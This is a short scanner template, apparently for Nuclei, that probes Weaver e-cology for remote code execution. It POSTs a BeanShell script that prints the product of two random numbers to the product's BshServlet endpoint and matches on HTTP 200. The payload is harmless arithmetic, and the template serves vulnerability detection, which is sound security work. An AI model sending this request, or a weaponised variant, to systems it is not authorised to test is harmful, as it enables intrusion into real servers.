id: poc-yaml-ecology-javabeanshell-rce

info:
  name: poc-yaml-ecology-javabeanshell-rce
  author: l1nk3r
  severity: critical
  tags: xray-converted,rce,ct-158320
  reference:
    - https://www.weaver.com.cn/cs/securityDownload.asp

http:
  - raw:
      - |
        POST /weaver/bsh.servlet.BshServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        bsh.script=print%28{{rand_int(1000, 9999)}}*{{rand_int(1000, 9999)}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200